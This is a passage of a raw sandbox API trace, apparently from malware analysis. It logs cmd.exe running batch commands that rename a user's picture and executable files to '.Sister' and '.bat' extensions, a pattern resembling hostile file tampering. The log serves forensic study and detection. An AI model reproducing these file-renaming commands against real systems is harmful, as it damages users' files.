_ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.243] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.243] GetFileType (hFile=0x50) returned 0x2 [0293.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.243] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.243] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.244] GetFileType (hFile=0x50) returned 0x2 [0293.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.244] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.245] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2bc90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2bc90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.245] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Gq9O pR9E.bmp\" \"Gq9O pR9E.bmp.Sister\" ") returned 40 [0293.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.245] GetFileType (hFile=0x50) returned 0x2 [0293.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.246] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.246] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x28, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x28) returned 1 [0293.247] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.247] GetFileType (hFile=0x50) returned 0x2 [0293.247] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.247] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.247] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.248] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.248] GetFileType (hFile=0x50) returned 0x2 [0293.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.248] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.249] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.249] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.249] GetFileType (hFile=0x50) returned 0x2 [0293.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.250] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.250] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.251] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.251] GetFileType (hFile=0x50) returned 0x2 [0293.251] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.251] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.252] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.257] GetFileType (hFile=0x50) returned 0x2 [0293.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.258] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.259] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2c0d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2c0d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.259] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bat\" ") returned 40 [0293.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.259] GetFileType (hFile=0x50) returned 0x2 [0293.259] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.259] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.260] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x28, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x28) returned 1 [0293.260] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.261] GetFileType (hFile=0x50) returned 0x2 [0293.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.261] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.263] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.268] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.268] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.269] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.269] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.269] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.269] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.269] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.269] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.269] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.269] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.269] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.269] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.269] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.269] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.269] ??_V@YAXPEAX@Z () returned 0x1 [0293.269] GetProcessHeap () returned 0x21ed8c70000 [0293.269] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed937bf30 [0293.269] GetProcessHeap () returned 0x21ed8c70000 [0293.269] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937bf30, Size=0x60) returned 0x21ed8d643b0 [0293.269] GetProcessHeap () returned 0x21ed8c70000 [0293.269] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d643b0) returned 0x60 [0293.270] GetProcessHeap () returned 0x21ed8c70000 [0293.270] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x68) returned 0x21ed8d63cb0 [0293.270] GetProcessHeap () returned 0x21ed8c70000 [0293.270] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed937c3b0 [0293.270] GetProcessHeap () returned 0x21ed8c70000 [0293.270] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937c3b0, Size=0x60) returned 0x21ed8d63e70 [0293.270] GetProcessHeap () returned 0x21ed8c70000 [0293.270] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63e70) returned 0x60 [0293.270] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.271] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.271] GetProcessHeap () returned 0x21ed8c70000 [0293.271] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc77e0 [0293.271] GetProcessHeap () returned 0x21ed8c70000 [0293.271] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5dc20 [0293.271] _wcsicmp (_String1="Gq9O pR9E.bmp", _String2=".") returned 57 [0293.271] _wcsicmp (_String1="Gq9O pR9E.bmp", _String2="..") returned 57 [0293.271] GetFileAttributesW (lpFileName="Gq9O pR9E.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp")) returned 0x20 [0293.271] GetProcessHeap () returned 0x21ed8c70000 [0293.271] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9290070 [0293.273] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9290080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.273] SetErrorMode (uMode=0x0) returned 0x0 [0293.273] SetErrorMode (uMode=0x1) returned 0x0 [0293.273] GetFullPathNameW (in: lpFileName="Gq9O pR9E.bmp", nBufferLength=0x7fe7, lpBuffer=0x21ed987fa80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp", lpFilePart=0xa6cf4fd660*="Gq9O pR9E.bmp") returned 0x26 [0293.273] SetErrorMode (uMode=0x0) returned 0x1 [0293.273] GetProcessHeap () returned 0x21ed8c70000 [0293.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5bee0 [0293.273] _wcsicmp (_String1="Gq9O pR9E.bmp", _String2=".") returned 57 [0293.273] _wcsicmp (_String1="Gq9O pR9E.bmp", _String2="..") returned 57 [0293.273] GetFileAttributesW (lpFileName="Gq9O pR9E.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp")) returned 0x20 [0293.273] ??_V@YAXPEAX@Z () returned 0x1 [0293.273] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.273] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.274] malloc (_Size=0xffce) returned 0x21ed988fa60 [0293.274] ??_V@YAXPEAX@Z () returned 0x21ed988fa60 [0293.274] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp")) returned 0x20 [0293.274] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.274] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.274] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5dc30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5dc30) returned 0x21ed8cc84a0 [0293.274] malloc (_Size=0xffce) returned 0x21ed98afa20 [0293.274] ??_V@YAXPEAX@Z () returned 0x21ed98afa20 [0293.275] ??_V@YAXPEAX@Z () returned 0x1 [0293.275] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Gq9O pR9E.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.276] FindNextFileW (in: hFindFile=0x21ed8cc84a0, lpFindFileData=0x21ed8d5dc30 | out: lpFindFileData=0x21ed8d5dc30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32594d70, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x26a4bbe0, ftLastAccessTime.dwHighDateTime=0x1d5e9aa, ftLastWriteTime.dwLowDateTime=0x26a4bbe0, ftLastWriteTime.dwHighDateTime=0x1d5e9aa, nFileSizeHigh=0x0, nFileSizeLow=0x1623, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gq9O pR9E.bmp", cAlternateFileName="")) returned 0 [0293.277] GetLastError () returned 0x12 [0293.277] FindClose (in: hFindFile=0x21ed8cc84a0 | out: hFindFile=0x21ed8cc84a0) returned 1 [0293.277] ??_V@YAXPEAX@Z () returned 0x1 [0293.277] ??_V@YAXPEAX@Z () returned 0x1 [0293.277] ??_V@YAXPEAX@Z () returned 0x1 [0293.277] ??_V@YAXPEAX@Z () returned 0x1 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7ba0 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c955a0, Size=0x16) returned 0x21ed8c95580 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95580) returned 0x16 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bf0, Size=0x20) returned 0x21ed8d45dd0 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45dd0) returned 0x20 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6bae0 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bae0, Size=0xb2) returned 0x21ed937c470 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c470) returned 0xb2 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c260 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c260, Size=0x30) returned 0x21ed8d2c260 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.278] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c260) returned 0x30 [0293.278] GetProcessHeap () returned 0x21ed8c70000 [0293.279] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c2a0 [0293.279] malloc (_Size=0x1ff9c) returned 0x21ed987fa80 [0293.279] GetProcessHeap () returned 0x21ed8c70000 [0293.279] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b870 [0293.279] GetProcessHeap () returned 0x21ed8c70000 [0293.279] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c3b0 [0293.279] ??_V@YAXPEAX@Z () returned 0x1 [0293.279] malloc (_Size=0x1ff9c) returned 0x21ed987fa80 [0293.279] GetProcessHeap () returned 0x21ed8c70000 [0293.279] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c170 [0293.279] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed987fa80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.279] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7900 [0293.279] FindClose (in: hFindFile=0x21ed8cc7900 | out: hFindFile=0x21ed8cc7900) returned 1 [0293.280] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7840 [0293.280] FindClose (in: hFindFile=0x21ed8cc7840 | out: hFindFile=0x21ed8cc7840) returned 1 [0293.280] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc8260 [0293.280] FindClose (in: hFindFile=0x21ed8cc8260 | out: hFindFile=0x21ed8cc8260) returned 1 [0293.280] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.281] malloc (_Size=0x1ff9c) returned 0x21ed989fa30 [0293.281] ??_V@YAXPEAX@Z () returned 0x21ed989fa30 [0293.281] GetProcessHeap () returned 0x21ed8c70000 [0293.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67cb0 [0293.281] ??_V@YAXPEAX@Z () returned 0x1 [0293.281] ??_V@YAXPEAX@Z () returned 0x1 [0293.281] GetProcessHeap () returned 0x21ed8c70000 [0293.281] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c2a0, Size=0x490) returned 0x21ed8d2c2a0 [0293.281] GetProcessHeap () returned 0x21ed8c70000 [0293.281] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c2a0) returned 0x490 [0293.281] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.281] GetFileType (hFile=0x50) returned 0x2 [0293.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.282] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.284] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.289] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.289] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.289] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.289] GetFileType (hFile=0x50) returned 0x2 [0293.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.290] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.290] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.291] GetFileType (hFile=0x50) returned 0x2 [0293.291] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.291] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.292] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2c270*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d2c270*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.292] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.292] GetFileType (hFile=0x50) returned 0x2 [0293.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.292] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.294] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.300] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.301] GetFileType (hFile=0x50) returned 0x2 [0293.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.301] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.301] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.308] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.309] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.309] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.309] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.309] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.309] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.309] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.309] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.309] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.309] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.309] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.309] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.309] 